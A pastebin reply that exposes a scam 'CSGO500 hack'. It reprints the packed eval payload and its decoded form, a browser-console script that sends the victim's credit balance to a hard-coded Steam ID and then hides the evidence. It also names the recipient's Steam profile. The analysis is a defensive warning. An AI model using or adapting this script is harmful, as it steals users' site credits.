Facebook
From 0xde0bfda7, 2 Years ago, written in Plain Text.
This paste is a reply to Re: Re: CSGO500 hack from Fiery Pudu - view diff
Embed
Download Paste or View Raw
Hits: 164
  1. The paste that I'm replying to is an obvious scam that will steal all
  2.   your CSGO500 credits.
  3. The credits will go to this person: https://steamcommunity.com/profiles/76561198801125925
  4.  
  5. If you're interested as to how you can come to this conclusion by yourself,
  6.   please keep on reading:
  7.  
  8. Most of the code supplied by the paste is commented, leaving only those
  9.   lines to be executed:
  10.  
  11. document.getElementsByClassName("nav-permalink")[2].click();
  12. var hash_1 = 765;var hash_2=6119;var hash_3=82404;var hash_4=11300;
  13. document.getElementsByClassName("bigtext")[1].style.color="#c8354e";
  14. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 h=b.c("h").e;3 H=h.P(/,/g,\'\');b.c("f-N-d").F=H;3 D=7;3 J=6;3 O=5;3 M=6;3 L=1;3 z=1;3 s=9;3 t=8;3 u=8;3 v=0;3 C=1;3 I=1;3 y=2;3 x=5;3 A=9;3 w=2;3 B=5;b.c("f-K-d").F=D.4()+J.4()+O.4()+M.4()+L.4()+z.4()+s.4()+t.4()+u.4()+v.4()+C.4()+I.4()+y.4()+x.4()+A.4()+w.4()+B.4();b.T(\'12-10-Q Z\')[1].14();$(\'#f-N-d\').a();$(\'#f-K-d\').a();$(\'#13-11-d\').a();$(\'#X-S\').a();$(\'#E-j-R\').a();$(\'#E-j\').a();$(\'#G-Y\').a();$(\'#G-j\').a();b.c("h").e="k r q n l m p o i";b.c("U").e="k r q n l m p o i";b.c("W-V").e="k r q n l m p o i";',62,67,'|||var|toString||||||remove|document|getElementById|input|innerText|send||balance|hack|table|Open|csgo500|to|on|the|start|Page|Account|color_red5_1|color_red5|color_blue1|color_blue2|color_gold3|color_gold1|color_blue5|color_red4|color_gold2|color_gold4|color_blue3|color_grey1|bet|value|sends|balance1|color_blue4|color_grey2|openid|color_red3|color_red2|bux|color_red1|replace|btn|body|details|getElementsByClassName|hash|toggle|autobetter|account|loader|noselect|content|url|slim|trade|click'.split('|'),0,{}));
  15.  
  16. The last line is most important, and obfuscated in the shittiest of manners.
  17. Simply replacing the eval (javascript function executing whatever code is
  18.   passed in a string as a parameter) call by a console.log call will reveal
  19.   the following code:
  20.  
  21. var balance = document.getElementById("balance").innerText;
  22. var balance1 = balance.replace(/,/g, '');
  23. document.getElementById("send-bux-input").value = balance1;
  24. var color_grey1 = 7;
  25. var color_grey2 = 6;
  26. var color_red1 = 5;
  27. var color_red2 = 6;
  28. var color_red3 = 1;
  29. var color_red4 = 1;
  30. var color_red5_1 = 9;
  31. var color_red5 = 8;
  32. var color_blue1 = 8;
  33. var color_blue2 = 0;
  34. var color_blue3 = 1;
  35. var color_blue4 = 1;
  36. var color_blue5 = 2;
  37. var color_gold1 = 5;
  38. var color_gold2 = 9;
  39. var color_gold3 = 2;
  40. var color_gold4 = 5;
  41. document.getElementById("send-openid-input").value = color_grey1.toString() + color_grey2.toString() + color_red1.toString() + color_red2.toString() + color_red3.toString() + color_red4.toString() + color_red5_1.toString() + color_red5.toString() + color_blue1.toString() + color_blue2.toString() + color_blue3.toString() + color_blue4.toString() + color_blue5.toString() + color_gold1.toString() + color_gold2.toString() + color_gold3.toString() + color_gold4.toString();
  42. document.getElementsByClassName('slim-content-btn noselect')[1].click();
  43. $('#send-bux-input').remove();
  44. $('#send-openid-input').remove();
  45. $('#trade-url-input').remove();
  46. $('#account-details').remove();
  47. $('#bet-table-body').remove();
  48. $('#bet-table').remove();
  49. $('#sends-loader').remove();
  50. $('#sends-table').remove();
  51. document.getElementById("balance").innerText = "Open Account Page on csgo500 to start the hack";
  52. document.getElementById("hash").innerText = "Open Account Page on csgo500 to start the hack";
  53. document.getElementById("autobetter-toggle").innerText = "Open Account Page on csgo500 to start the hack";
  54.  
  55. This seems to be getting the amount of credits you've got, and trying to send
  56.   them to an unknown user when you access the "Account page" as prompted by
  57.   the last few lines.
  58. Once cleaned, we get the following line setting the "send-openid-input" input
  59.   value:
  60.  
  61. document.getElementById("send-openid-input").value = "76561198801125925";
  62.  
  63. Which leads us to njrat1337 ( https://steamcommunity.com/profiles/76561198801125925 )